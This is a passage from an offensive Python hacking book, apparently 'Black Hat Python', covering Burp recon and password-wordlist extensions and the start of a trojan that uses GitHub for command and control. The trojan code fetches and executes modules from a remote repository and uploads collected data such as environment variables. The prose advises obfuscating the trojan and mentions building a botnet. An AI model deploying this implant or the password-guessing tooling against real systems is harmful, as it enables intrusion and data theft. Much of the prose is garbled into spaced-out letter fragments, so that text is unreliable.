f u ncti o n h and le th e c lic k e v ent
➍ . N ow l e t’ s a d d th e f u ncti o nality to p erfo rm th e B in g
query , o utp ut th e r e su lts , a nd a d d a ny d is c o vere d v ir tu al h o sts to B urp ’s ta rg et s c o pe.
def bing_menu(self,event):
# grab the details of what the user clicked
➊ http_traffic = self.context.getSelectedMessages()
print "%d requests highlighted" % len(http_traffic)
for traffic in http_traffic:
http_service = traffic.getHttpService()
host = http_service.getHost()
print "User selected host: %s" % host
self.bing_search(host)
return
def bing_search(self,host):
# check if we have an IP or hostname
is_ip = re.match("[0-9]+(?:\.[0-9]+){3}", host)
➋ if is_ip:
ip_address = host
domain = False
else:
ip_address = socket.gethostbyname(host)
domain = True
bing_query_string = "'ip:%s'" % ip_address
➌ self.bing_query(bing_query_string)
if domain:
bing_query_string = "'domain:%s'" % host
➍ self.bing_query(bing_query_string)
Our
bing_menu
f u ncti o n g ets tr ig gere d w hen th e u se r c lic ks th e c o nte xt m enu i te m w e d efin ed . W e
re tr ie v e a ll o f th e H TTP r e q uests th at w ere h ig hlig hte d
➊ a nd th en r e tr ie v e th e h o st p orti o n o f th e
re q uest f o r e ach o ne a nd s e nd i t to o ur
bing_search
f u ncti o n f o r f u rth er p ro cessin g. T he
bing_search
f u ncti o n f ir s t d ete rm in es i f w e w ere p asse d a n I P a d dre ss o r a h o stn am e
➋ . W e th en
query B in g f o r a ll v ir tu al h o sts th at h av e th e s a m e I P a d dre ss
➌ a s th e h o st c o nta in ed w ith in th e
HTTP r e q uest th at w as r ig ht- c lic ked . I f a d om ain h as b een p asse d to o ur e xte nsio n, th en w e a ls o d o a
se co nd ary s e arc h
➍ f o r a ny s u b dom ain s th at B in g m ay h av e i n d exed . N ow l e t’ s i n sta ll th e p lu m bin g
to u se B urp ’s H TTP A PI to s e nd th e r e q uest to B in g a nd p ars e th e r e su lts . A dd th e f o llo w in g c o de,
ensu rin g th at y o u’re ta b bed c o rre ctl y i n to o ur
BurpExtender
c la ss, o r y o u’ll r u n i n to e rro rs .
def bing_query(self,bing_query_string):
print "Performing Bing search: %s" % bing_query_string
# encode our query
quoted_query = urllib.quote(bing_query_string)
http_request = "GET https://api.datamarket.azure.com/Bing/Search/Web?$.
format=json&$top=20&Query=%s HTTP/1.1\r\n" % quoted_query
http_request += "Host: api.datamarket.azure.com\r\n"

http_request += "Connection: close\r\n"
➊ http_request += "Authorization: Basic %s\r\n" % base64.b64encode(":%s" % .
bing_api_key)
http_request += "User-Agent: Blackhat Python\r\n\r\n"
➋ json_body = self._callbacks.makeHttpRequest("api.datamarket.azure.com",.
443,True,http_request).tostring()
➌ json_body = json_body.split("\r\n\r\n",1)[1]
try:
➍ r = json.loads(json_body)
if len(r["d"]["results"]):
for site in r["d"]["results"]:
➎ print "*" * 100
print site['Title']
print site['Url']
print site['Description']
print "*" * 100
j_url = URL(site['Url'])
➏ if not self._callbacks.isInScope(j_url):
print "Adding to Burp scope"
self._callbacks.includeInScope(j_url)
except:
print "No results from Bing"
pass
return
Okay! B urp ’s H TTP A PI r e q uir e s th at w e b uild u p th e e nti r e H TTP r e q uest a s a s tr in g b efo re s e nd in g
it o ff, a nd i n p arti c ula r y o u c an s e e th at w e n eed to b ase 6 4-e nco de
➊ o ur B in g A PI k ey a nd u se
HTTP b asic a uth enti c ati o n to m ake th e A PI c all. W e th en s e nd o ur H TTP r e q uest
➋ to th e M ic ro so ft
se rv ers . W hen th e r e sp onse r e tu rn s, w e’ll h av e th e e nti r e r e sp onse i n clu d in g th e h ead ers , s o w e s p lit
th e h ead ers o ff
➌ a nd th en p ass i t to o ur J S O N p ars e r
➍ . F or e ach s e t o f r e su lts , w e o utp ut s o m e
in fo rm ati o n a b out th e s ite th at w e d is c o vere d
➎ a nd i f th e d is c o vere d s ite i s n o t i n B urp ’s ta rg et
sc o pe
➏ , w e a uto m ati c ally a d d i t. T his i s a g re at b le nd o f u sin g th e J y th o n A PI a nd p ure P yth o n i n a
Burp e xte nsio n to d o a d diti o nal r e co n w ork w hen a tta ckin g a p arti c ula r ta rg et. L et’ s ta ke i t f o r a s p in .

Kic k in g t h e T ir e s
Use th e s a m e p ro ced ure w e u se d f o r o ur f u zzin g e xte nsio n to g et th e B in g s e arc h e xte nsio n w ork in g.
When i t’ s l o ad ed , b ro w se to
http ://te stp hp.v u ln w eb .c o m /
, a nd th en r ig ht- c lic k th e G ET r e q uest y o u
ju st i s su ed . I f th e e xte nsio n i s l o ad ed p ro perly , y o u s h o uld s e e th e m enu o pti o n
Send t o B in g
dis p la yed a s s h o w n i n
Fig ure 6 -9
.
Fig ure 6 -9 . N ew m en u o ptio n s h ow in g o ur e xte n sio n
When y o u c lic k th is m enu o pti o n, d ep end in g o n th e o utp ut y o u c ho se w hen y o u l o ad ed th e e xte nsio n,
yo u s h o uld s ta rt to s e e r e su lts f r o m B in g a s s h o w n i n
Fig ure 6 -1 0
.

Fig ure 6 -1 0. O ur e xte n sio n p ro vid in g o utp ut f ro m th e B in g A PI s e a rc h
And i f y o u c lic k th e
Targ et
ta b i n B urp a nd th en s e le ct
Sco pe
, y o u w ill s e e n ew i te m s a uto m ati c ally
ad ded to o ur ta rg et s c o pe a s s h o w n i n
Fig ure 6 -1 1
. T he ta rg et s c o pe l im its a cti v iti e s s u ch a s a tta cks,
sp id erin g, a nd s c ans to o nly th o se h o sts d efin ed .

Fig ure 6 -1 1 . S how in g h ow d is c o vere d h osts a re a uto m atic a lly a dded to B urp ’s ta rg et s c o pe

Tu rn in g W eb sit e C on te n t i n to P assw ord G old
Many ti m es, s e curity c o m es d ow n to o ne th in g: u se r p assw ord s. I t’ s s a d b ut tr u e. M akin g th in gs
wors e , w hen i t c o m es to w eb a p plic ati o ns, e sp ecia lly c usto m o nes, i t’ s a ll to o c o m mon to f in d th at
acco unt l o cko uts a re n’t i m ple m ente d . I n o th er i n sta nces, s tr o ng p assw ord s a re n o t e nfo rc ed . I n th ese
case s, a n o nlin e p assw ord g uessin g s e ssio n l ik e th e o ne i n th e l a st c hap te r m ig ht b e j u st th e ti c ket to
gain a ccess to th e s ite .
The tr ic k to o nlin e p assw ord g uessin g i s g etti n g th e r ig ht w ord lis t. Y ou c an’t te st 1 0 m illio n
passw ord s i f y o u’re i n a h urry , s o y o u n eed to b e a b le to c re ate a w ord lis t ta rg ete d to th e s ite i n
questi o n. O f c o urs e , th ere a re s c rip ts i n th e K ali L in ux d is tr ib uti o n th at c ra w l a w eb site a nd g enera te
a w ord lis t b ase d o n s ite c o nte nt. T ho ugh i f y o u’v e a lr e ad y u se d B urp S pid er to c ra w l th e s ite , w hy
se nd m ore tr a ffic j u st to g enera te a w ord lis t? P lu s, th o se s c rip ts u su ally h av e a to n o f c o m mand -lin e
arg um ents to r e m em ber. I f y o u’re a nyth in g l ik e m e, y o u’v e a lr e ad y m em oriz e d e no ugh c o m mand -lin e
arg um ents to i m pre ss y o ur f r ie nd s, s o l e t’ s m ake B urp d o th e h eav y l ifti n g.
Open
bhp_w ord lis t.p y
a nd k no ck o ut th is c o de.
from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem
from java.util import List, ArrayList
from java.net import URL
import re
from datetime import datetime
from HTMLParser import HTMLParser
class TagStripper(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.page_text = []
def handle_data(self, data):
➊ self.page_text.append(data)
def handle_comment(self, data):
➋ self.handle_data(data)
def strip(self, html):
self.feed(html)
➌ return " ".join(self.page_text)
class BurpExtender(IBurpExtender, IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self.context = None
self.hosts = set()
# Start with something we know is common
➍ self.wordlist = set(["password"])
# we set up our extension
callbacks.setExtensionName("BHP Wordlist")
callbacks.registerContextMenuFactory(self)
return
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()

menu_list.add(JMenuItem("Create Wordlist",
actionPerformed=self.wordlist_menu))
return menu_list
The c o de i n th is l is ti n g s h o uld b e p re tty f a m ilia r b y n o w . W e s ta rt b y i m porti n g th e r e q uir e d m odule s.
A h elp er
TagStripper
c la ss w ill a llo w u s to s tr ip th e H TM L ta gs o ut o f th e H TTP r e sp onse s w e
pro cess l a te r o n. I ts
handle_data
f u ncti o n s to re s th e p age te xt
➊ i n a m em ber v aria b le . W e a ls o
defin e
handle_comment
b ecause w e w ant th e w ord s s to re d i n d ev elo per c o m ments to b e a d ded to
our p assw ord l is t a s w ell. U nd er th e c o vers ,
handle_comment
j u st c alls
handle_data
➋ ( in c ase
we w ant to c hange h o w w e p ro cess p age te xt d ow n th e r o ad ).
The
strip
f u ncti o n f e ed s H TM L c o de to th e b ase c la ss,
HTMLParser
, a nd r e tu rn s th e r e su lti n g p age
te xt
➌ , w hic h w ill c o m e i n h and y l a te r. T he r e st i s a lm ost e xactl y th e s a m e a s th e s ta rt o f th e
bhp_bin g.p y
s c rip t w e j u st f in is h ed . O nce a gain , th e g o al i s to c re ate a c o nte xt m enu i te m i n th e B urp
UI. T he o nly th in g n ew h ere i s th at w e s to re o ur w ord lis t i n a
set
, w hic h e nsu re s th at w e d on’t
in tr o duce d up lic ate w ord s a s w e g o . W e i n iti a liz e th e
set
w ith e v ery o ne’s f a v orite p assw ord ,
“p assw ord ”
➍ , j u st to m ake s u re i t e nd s u p i n o ur f in al l is t.
Now l e t’ s a d d th e l o gic to ta ke th e s e le cte d H TTP tr a ffic f r o m B urp a nd tu rn i t i n to a b ase w ord lis t.
def wordlist_menu(self,event):
# grab the details of what the user clicked
http_traffic = self.context.getSelectedMessages()
for traffic in http_traffic:
http_service = traffic.getHttpService()
host = http_service.getHost()
➊ self.hosts.add(host)
http_response = traffic.getResponse()
if http_response:
➋ self.get_words(http_response)
self.display_wordlist()
return
def get_words(self, http_response):
headers, body = http_response.tostring().split('\r\n\r\n', 1)
# skip non-text responses
➌ if headers.lower().find("content-type: text") == -1:
return
tag_stripper = TagStripper()
➍ page_text = tag_stripper.strip(body)
➎ words = re.findall("[a-zA-Z]\w{2,}", page_text)
for word in words:
# filter out long strings
if len(word) <= 12:
➏ self.wordlist.add(word.lower())
return
Our f ir s t o rd er o f b usin ess i s to d efin e th e
wordlist_menu
f u ncti o n, w hic h i s o ur m enu-c lic k h and le r.
It s a v es th e n am e o f th e r e sp ond in g h o st
➊ f o r l a te r, a nd th en r e tr ie v es th e H TTP r e sp onse a nd f e ed s
it to o ur
get_words
f u ncti o n
➋ . F ro m th ere ,
get_words
s p lits o ut th e h ead er f r o m th e m essa ge b ody,

checkin g to m ake s u re w e’re o nly tr y in g to p ro cess te xt- b ase d r e sp onse s
➌ . O ur
TagStripper
c la ss
➍ s tr ip s th e H TM L c o de f r o m th e r e st o f th e p age te xt. W e u se a r e gula r e xp re ssio n to f in d a ll w ord s
sta rti n g w ith a n a lp hab eti c c hara cte r f o llo w ed b y tw o o r m ore “ w ord ” c hara cte rs
➎ . A fte r m akin g
th e f in al c ut, th e s u ccessfu l w ord s a re s a v ed i n l o w erc ase to th e
wordlist
➏ .
Now l e t’ s r o und o ut th e s c rip t b y g iv in g i t th e a b ility to m angle a nd d is p la y th e c ap tu re d w ord lis t.
def mangle(self, word):
year = datetime.now().year
➊ suffixes = ["", "1", "!", year]
mangled = []
for password in (word, word.capitalize()):
for suffix in suffixes:
➋ mangled.append("%s%s" % (password, suffix))
return mangled
def display_wordlist(self):
➌ print "#!comment: BHP Wordlist for site(s) %s" % ", ".join(self.hosts)
for word in sorted(self.wordlist):
for password in self.mangle(word):
print password
return
Very n ic e! T he
mangle
f u ncti o n ta kes a b ase w ord a nd tu rn s i t i n to a n um ber o f p assw ord g uesse s
base d o n s o m e c o m mon p assw ord c re ati o n “ str a te gie s.” I n th is s im ple e xam ple , w e c re ate a l is t o f
su ffix es to ta ck o n th e e nd o f th e b ase w ord , i n clu d in g th e c urre nt y ear
➊ . N ext w e l o op th ro ugh e ach
su ffix a nd a d d i t to th e b ase w ord
➋ to c re ate a u niq ue p assw ord a tte m pt. W e d o a no th er l o op w ith a
cap ita liz e d v ers io n o f th e b ase w ord f o r g o od m easu re . I n th e
display_wordlist
f u ncti o n, w e p rin t
a “ Jo hn th e R ip per” – sty le c o m ment
➌ to r e m in d u s w hic h s ite s w ere u se d to g enera te th is w ord lis t.
Then w e m angle e ach b ase w ord a nd p rin t th e r e su lts . T im e to ta ke th is b ab y f o r a s p in .

Kic k in g t h e T ir e s
Clic k th e
Exte nder
ta b i n B urp , c lic k th e
Add
b utto n, a nd u se th e s a m e p ro ced ure w e u se d f o r o ur
pre v io us e xte nsio ns to g et th e W ord lis t e xte nsio n w ork in g. W hen y o u h av e i t l o ad ed , b ro w se to
http ://te stp hp.v u ln w eb .c o m /
.
Rig ht- c lic k th e s ite i n th e S ite M ap p ane a nd s e le ct
Spid er t h is h ost
, a s s h o w n i n
Fig ure 6 -1 2
.
Fig ure 6 -1 2. S pid erin g a h ost w ith B urp
Afte r B urp h as v is ite d a ll th e l in ks o n th e ta rg et s ite , s e le ct a ll th e r e q uests i n th e to p-rig ht p ane, r ig ht-
clic k th em to b rin g u p th e c o nte xt m enu, a nd s e le ct
Cre ate W ord lis t
, a s s h o w n i n
Fig ure 6 -1 3
.

Fig ure 6 -1 3. S en din g th e r e q uests to th e B H P W ord lis t e xte n sio n
Now c heck th e o utp ut ta b o f th e e xte nsio n. I n p ra cti c e, w e’d s a v e i ts o utp ut to a f ile , b ut f o r
dem onstr a ti o n p urp ose s w e d is p la y th e w ord lis t i n B urp , a s s h o w n i n
Fig ure 6 -1 4
.
You c an n o w f e ed th is l is t b ack i n to B urp I n tr u d er to p erfo rm th e a ctu al p assw ord -g uessin g a tta ck.

Fig ure 6 -1 4. A p assw ord lis t b ase d o n c o nte n t f ro m th e ta rg et w eb site
We h av e n o w d em onstr a te d a s m all s u b se t o f th e B urp A PI, i n clu d in g b ein g a b le to g enera te o ur o w n
atta ck p aylo ad s a s w ell a s b uild in g e xte nsio ns th at i n te ra ct w ith th e B urp U I. D urin g a p enetr a ti o n te st
yo u w ill o fte n c o m e u p a gain st s p ecific p ro ble m s o r a uto m ati o n n eed s, a nd th e B urp E xte nd er A PI
pro vid es a n e xcelle nt i n te rfa ce to c o de y o ur w ay o ut o f a c o rn er, o r a t l e ast s a v e y o u f r o m h av in g to
co nti n ually c o py a nd p aste c ap tu re d d ata f r o m B urp to a no th er to ol.
In th is c hap te r, w e s h o w ed y o u h o w to b uild a n e xcelle nt r e co nnais sa nce to ol to a d d to y o ur B urp to ol
belt. A s i s , th is e xte nsio n o nly r e tr ie v es th e to p 2 0 r e su lts f r o m B in g, s o a s h o m ew ork y o u c o uld w ork
on m akin g a d diti o nal r e q uests to e nsu re th at y o u r e tr ie v e a ll o f th e r e su lts . T his w ill r e q uir e d oin g a
bit o f r e ad in g a b out th e B in g A PI a nd w riti n g s o m e c o de to h and le th e l a rg er r e su lts s e t. Y ou o f
co urs e c o uld th en te ll th e B urp s p id er to c ra w l e ach o f th e n ew s ite s y o u d is c o ver a nd a uto m ati c ally
hunt f o r v uln era b iliti e s!
[ 13
]
Vis it
http ://w ww.b in g.c o m /d ev/e n -u s/d ev-c en te r/
to g et s e t u p w it h y our o w n f re e B in g A PI k ey.

Chap te r 7 . G it h ub C om man d a n d C on tr o l
One o f th e m ost c halle ngin g a sp ects o f c re ati n g a s o lid tr o ja n f r a m ew ork i s a sy nchro no usly
co ntr o llin g, u p dati n g, a nd r e ceiv in g d ata f r o m y o ur d ep lo yed i m pla nts . I t’ s c ru cia l to h av e a r e la ti v ely
univ ers a l w ay to p ush c o de to y o ur r e m ote tr o ja ns. T his f le xib ility i s r e q uir e d n o t j u st to c o ntr o l y o ur
tr o ja ns i n o rd er to p erfo rm d iffe re nt ta sk s, b ut a ls o b ecause y o u m ig ht h av e a d diti o nal c o de th at’ s
sp ecific to th e ta rg et o pera ti n g s y ste m .
So w hile h ackers h av e h ad l o ts o f c re ati v e m eans o f c o m mand a nd c o ntr o l o ver th e y ears , s u ch a s
IR C o r e v en T w itte r, w e’ll tr y a s e rv ic e a ctu ally d esig ned f o r c o de. W e’ll u se G itH ub a s a w ay to
sto re i m pla nt c o nfig ura ti o n i n fo rm ati o n a nd e xfiltr a te d d ata , a s w ell a s a ny m odule s th at th e i m pla nt
need s i n o rd er to e xecute ta sk s. W e’ll a ls o e xp lo re h o w to h ack P yth o n’s n ati v e l ib ra ry i m port
mechanis m s o th at a s y o u c re ate n ew tr o ja n m odule s, y o ur i m pla nts c an a uto m ati c ally a tte m pt to
re tr ie v e th em a nd a ny d ep end ent l ib ra rie s d ir e ctl y f r o m y o ur r e p o, to o. K eep i n m in d th at y o ur tr a ffic
to G itH ub w ill b e e ncry p te d o ver S SL, a nd th ere a re v ery f e w e nte rp ris e s th at I ’ v e s e en th at a cti v ely
blo ck G itH ub i ts e lf.
One th in g to n o te i s th at w e’ll u se a p ub lic r e p o to p erfo rm th is te sti n g; i f y o u’d l ik e to s p end th e
money, y o u c an g et a p riv ate r e p o s o th at p ry in g e yes c an’t s e e w hat y o u’re d oin g. A dditi o nally , a ll o f
yo ur m odule s, c o nfig ura ti o n, a nd d ata c an b e e ncry p te d u sin g p ub lic /p riv ate k ey p air s , w hic h I
dem onstr a te i n
Chap te r 9
. L et’ s g et s ta rte d !

Settin g U p a G it H ub A cco u nt
If y o u d on’t h av e a G itH ub a cco unt, th en h ead o ver to G itH ub .c o m , s ig n u p , a nd c re ate a n ew
re p osito ry c alle d
chapter7
. N ext, y o u’ll w ant to i n sta ll th e P yth o n G itH ub A PI l ib ra ry
[ 14
]
s o th at y o u
can a uto m ate y o ur i n te ra cti o n w ith y o ur r e p o. Y ou c an d o th is f r o m th e c o m mand l in e b y d oin g th e
fo llo w in g:
pip install github3.py
If y o u h av en’t d one s o a lr e ad y, i n sta ll th e g it c lie nt. I d o m y d ev elo pm ent f r o m a L in ux m achin e, b ut i t
work s o n a ny p la tf o rm . N ow l e t’ s c re ate a b asic s tr u ctu re f o r o ur r e p o. D o th e f o llo w in g o n th e
co m mand l in e, a d ap ti n g a s n ecessa ry i f y o u’re o n W in d ow s:
$
mkdir trojan
$
cd trojan
$
git init
$
mkdir modules
$
mkdir config
$
mkdir data
$
touch modules/.gitignore
$
touch config/.gitignore
$
touch data/.gitignore
$
git add .
$
git commit -m "Adding repo structure for trojan."
$
git remote add origin https://github.com//chapter7.git
$
git push origin master
Here , w e’v e c re ate d th e i n iti a l s tr u ctu re f o r o ur r e p o. T he
config
d ir e cto ry h o ld s c o nfig ura ti o n f ile s
th at w ill b e u niq uely i d enti fie d f o r e ach tr o ja n. A s y o u d ep lo y tr o ja ns, y o u w ant e ach o ne to p erfo rm
diffe re nt ta sk s a nd e ach tr o ja n w ill c heck o ut i ts u niq ue c o nfig ura ti o n f ile . T he
modules
d ir e cto ry
co nta in s a ny m odula r c o de th at y o u w ant th e tr o ja n to p ic k u p a nd th en e xecute . W e w ill i m ple m ent a
sp ecia l i m port h ack to a llo w o ur tr o ja n to i m port l ib ra rie s d ir e ctl y f r o m o ur G itH ub r e p o. T his
re m ote l o ad c ap ab ility w ill a ls o a llo w y o u to s ta sh th ir d -p arty l ib ra rie s i n G itH ub s o y o u d on’t h av e
to c o nti n ually r e co m pile y o ur tr o ja n e v ery ti m e y o u w ant to a d d n ew f u ncti o nality o r d ep end encie s.
The
data
d ir e cto ry i s w here th e tr o ja n w ill c heck i n a ny c o lle cte d d ata , k eystr o kes, s c re ensh o ts , a nd
so f o rth . N ow l e t’ s c re ate s o m e s im ple m odule s a nd a n e xam ple c o nfig ura ti o n f ile .

Cre a tin g M od ule s
In l a te r c hap te rs , y o u w ill d o n asty b usin ess w ith y o ur tr o ja ns, s u ch a s l o ggin g k eystr o kes a nd ta kin g
sc re ensh o ts . B ut to s ta rt, l e t’ s c re ate s o m e s im ple m odule s th at w e c an e asily te st a nd d ep lo y. O pen a
new f ile i n th e m odule s d ir e cto ry , n am e i t
dir lis te r.p y
, a nd e nte r th e f o llo w in g c o de:
import os
def run(**args):
print "[*] In dirlister module."
files = os.listdir(".")
return str(files)
This l ittl e s n ip pet o f c o de s im ply e xp ose s a
run
f u ncti o n th at l is ts a ll o f th e f ile s i n th e c urre nt
dir e cto ry a nd r e tu rn s th at l is t a s a s tr in g. E ach m odule th at y o u d ev elo p s h o uld e xp ose a
run
f u ncti o n
th at ta kes a v aria b le n um ber o f a rg um ents . T his e nab le s y o u to l o ad e ach m odule th e s a m e w ay a nd
le av es e no ugh e xte nsib ility s o th at y o u c an c usto m iz e th e c o nfig ura ti o n f ile s to p ass a rg um ents to th e
module i f y o u d esir e .
Now l e t’ s c re ate a no th er m odule c alle d
en vir o nm en t.p y
.
import os
def run(**args):
print "[*] In environment module."
return str(os.environ)
This m odule s im ply r e tr ie v es a ny e nv ir o nm ent v aria b le s th at a re s e t o n th e r e m ote m achin e o n w hic h
th e tr o ja n i s e xecuti n g. N ow l e t’ s p ush th is c o de to o ur G itH ub r e p o s o th at i t i s u se ab le b y o ur tr o ja n.
Fro m th e c o m mand l in e, e nte r th e f o llo w in g c o de f r o m y o ur m ain r e p osito ry d ir e cto ry :
$
git add
.
$
git commit -m "Adding new modules"
$
git push origin master
Username: ********
Password: ********
You s h o uld th en s e e y o ur c o de g etti n g p ush ed to y o ur G itH ub r e p o; f e el f r e e to l o g i n to y o ur a cco unt
and d oub le -c heck! T his i s e xactl y h o w y o u c an c o nti n ue to d ev elo p c o de i n th e f u tu re . I w ill l e av e th e
in te gra ti o n o f m ore c o m ple x m odule s to y o u a s a h o m ew ork a ssig nm ent. S ho uld y o u h av e a h und re d
dep lo yed tr o ja ns, y o u c an p ush n ew m odule s to y o ur G itH ub r e p o a nd Q A th em b y e nab lin g y o ur n ew
module i n a c o nfig ura ti o n f ile f o r y o ur l o cal v ers io n o f th e tr o ja n. T his w ay, y o u c an te st o n a V M o r
ho st h ard w are th at y o u c o ntr o l b efo re a llo w in g o ne o f y o ur r e m ote tr o ja ns to p ic k u p th e c o de a nd u se
it.

Tro ja n C on fig u ra tio n
We w ant to b e a b le to ta sk o ur tr o ja n w ith p erfo rm in g c erta in a cti o ns o ver a p erio d o f ti m e. T his
means th at w e n eed a w ay to te ll i t w hat a cti o ns to p erfo rm , a nd w hat m odule s a re r e sp onsib le f o r
perfo rm in g th o se a cti o ns. U sin g a c o nfig ura ti o n f ile g iv es u s th at l e v el o f c o ntr o l, a nd i t a ls o e nab le s
us to e ffe cti v ely p ut a tr o ja n to s le ep ( b y n o t g iv in g i t a ny ta sk s) s h o uld w e c ho ose to . E ach tr o ja n th at
yo u d ep lo y s h o uld h av e a u niq ue i d enti fie r, b oth s o th at y o u c an s o rt o ut th e r e tr ie v ed d ata a nd s o th at
yo u c an c o ntr o l w hic h tr o ja n p erfo rm s c erta in ta sk s. W e’ll c o nfig ure th e tr o ja n to l o ok i n th e
co nfig
dir e cto ry f o r
TR O JA N ID .j s o n
, w hic h w ill r e tu rn a s im ple J S O N d ocum ent th at w e c an p ars e o ut,
co nv ert to a P yth o n d ic ti o nary , a nd th en u se . T he J S O N f o rm at m akes i t e asy to c hange c o nfig ura ti o n
opti o ns a s w ell. M ove i n to y o ur
co nfig
d ir e cto ry a nd c re ate a f ile c alle d
abc.j s o n
w ith th e f o llo w in g
co nte nt:
[
{
"module" : "dirlister"
},
{
"module" : "environment"
}
]
This i s j u st a s im ple l is t o f m odule s th at w e w ant th e r e m ote tr o ja n to r u n. L ate r y o u’ll s e e h o w w e
re ad i n th is J S O N d ocum ent a nd th en i te ra te o ver e ach o pti o n to g et th o se m odule s l o ad ed . A s y o u
bra in sto rm m odule i d eas, y o u m ay f in d th at i t’ s u se fu l to i n clu d e a d diti o nal c o nfig ura ti o n o pti o ns s u ch
as e xecuti o n d ura ti o n, n um ber o f ti m es to r u n th e s e le cte d m odule , o r a rg um ents to b e p asse d to th e
module . D ro p i n to a c o m mand l in e a nd i s su e th e f o llo w in g c o m mand f r o m y o ur m ain r e p o d ir e cto ry .
$
git add .
$
git commit -m "Adding simple config."
$
git push origin master
Username: ********
Password: ********
This c o nfig ura ti o n d ocum ent i s q uite s im ple . Y ou p ro vid e a l is t o f d ic ti o narie s th at te ll th e tr o ja n w hat
module s to i m port a nd r u n. A s y o u b uild u p y o ur f r a m ew ork , y o u c an a d d a d diti o nal f u ncti o nality i n
th ese c o nfig ura ti o n o pti o ns, i n clu d in g m eth o ds o f e xfiltr a ti o n, a s I s h o w y o u i n
Chap te r 9
. N ow th at
yo u h av e y o ur c o nfig ura ti o n f ile s a nd s o m e s im ple m odule s to r u n, y o u’ll s ta rt b uild in g o ut th e m ain
tr o ja n p ie ce.

Build in g a G it h ub-A w are T ro ja n
Now w e’re g o in g to c re ate th e m ain tr o ja n th at w ill s u ck d ow n c o nfig ura ti o n o pti o ns a nd c o de to r u n
fr o m G itH ub . T he f ir s t s te p i s to b uild th e n ecessa ry c o de to h and le c o nnecti n g, a uth enti c ati n g, a nd
co m munic ati n g to th e G itH ub A PI. L et’ s s ta rt b y o penin g a n ew f ile c alle d
git_ tr o ja n.p y
a nd e nte rin g
th e f o llo w in g c o de:
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
➊ trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules= []
configured = False
task_queue = Queue.Queue()
This i s j u st s o m e s im ple s e tu p c o de w ith th e n ecessa ry i m ports , w hic h s h o uld k eep o ur o vera ll tr o ja n
siz e r e la ti v ely s m all w hen c o m pile d . I s a y r e la ti v ely b ecause m ost c o m pile d P yth o n b in arie s u sin g
py2exe
[ 15
]
a re a ro und 7 M B. T he o nly th in g to n o te i s th e
trojan_id
v aria b le
➊ th at u niq uely
id enti fie s th is tr o ja n. I f y o u w ere to e xp lo de th is te chniq ue o ut to a f u ll b otn et, y o u’d w ant th e
cap ab ility to g enera te tr o ja ns, s e t th eir I D , a uto m ati c ally c re ate a c o nfig ura ti o n f ile th at’ s p ush ed to
GitH ub , a nd th en c o m pile th e tr o ja n i n to a n e xecuta b le . W e w on’t b uild a b otn et to day, th o ugh; I ’ ll l e t
yo ur i m agin ati o n d o th e w ork .
Now l e t’ s p ut th e r e le v ant G itH ub c o de i n p la ce.
def connect_to_github():
gh = login(username="yourusername",password="yourpassword")
repo = gh.repository("yourusername","chapter7")
branch = repo.branch("master")
return gh,repo,branch
def get_file_contents(filepath):
gh,repo,branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True

for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh,repo,branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000))
repo.create_file(remote_path,"Commit message",base64.b64encode(data))
return
These f o ur f u ncti o ns r e p re se nt th e c o re i n te ra cti o n b etw een th e tr o ja n a nd G itH ub . T he
connect_to_github
f u ncti o n s im ply a uth enti c ate s th e u se r to th e r e p osito ry , a nd r e tr ie v es th e c urre nt
repo
a nd
branch
o bje cts f o r u se b y o th er f u ncti o ns. K eep i n m in d th at i n a r e al- w orld s c enario , y o u
want to o bfu sc ate th is a uth enti c ati o n p ro ced ure a s b est a s y o u c an. Y ou m ig ht a ls o w ant to th in k a b out
what e ach tr o ja n c an a ccess i n y o ur r e p osito ry b ase d o n a ccess c o ntr o ls s o th at i f y o ur tr o ja n i s
caught, s o m eo ne c an’t c o m e a lo ng a nd d ele te a ll o f y o ur r e tr ie v ed d ata . T he
get_file_contents
fu ncti o n i s r e sp onsib le f o r g ra b bin g f ile s f r o m th e r e m ote r e p o a nd th en r e ad in g th e c o nte nts i n
lo cally . T his i s u se d b oth f o r r e ad in g c o nfig ura ti o n o pti o ns a s w ell a s r e ad in g m odule s o urc e c o de.
The
get_trojan_config
f u ncti o n i s r e sp onsib le f o r r e tr ie v in g th e r e m ote c o nfig ura ti o n d ocum ent
fr o m th e r e p o s o th at y o ur tr o ja n k no w s w hic h m odule s to r u n. A nd th e f in al f u ncti o n
store_module_result
i s u se d to p ush a ny d ata th at y o u’v e c o lle cte d o n th e ta rg et m achin e. N ow
le t’ s c re ate a n i m port h ack to i m port r e m ote f ile s f r o m o ur G itH ub r e p o.

Hack in g P yth on ’s i m port F unctio n alit y
If y o u’v e m ad e i t th is f a r i n th e b ook, y o u k no w th at w e u se P yth o n’s
import
f u ncti o nality to p ull i n
exte rn al l ib ra rie s s o th at w e c an u se th e c o de c o nta in ed w ith in . W e w ant to b e a b le to d o th e s a m e
th in g f o r o ur tr o ja n, b ut b eyo nd th at, w e a ls o w ant to m ake s u re th at i f w e p ull i n a d ep end ency ( s u ch
as S cap y o r
netaddr
), o ur tr o ja n m akes th at m odule a v aila b le to a ll s u b se q uent m odule s th at w e p ull
in . P yth o n a llo w s u s to i n se rt o ur o w n f u ncti o nality i n to h o w i t i m ports m odule s, s u ch th at i f a m odule
canno t b e f o und l o cally , o ur i m port c la ss w ill b e c alle d , w hic h w ill a llo w u s to r e m ote ly r e tr ie v e th e
lib ra ry f r o m o ur r e p o. T his i s a chie v ed b y a d din g a c usto m c la ss to th e
sys.meta_path
l is t.
[ 16
]
L et’ s
cre ate a c usto m l o ad in g c la ss n o w b y a d din g th e f o llo w in g c o de:
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self,fullname,path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
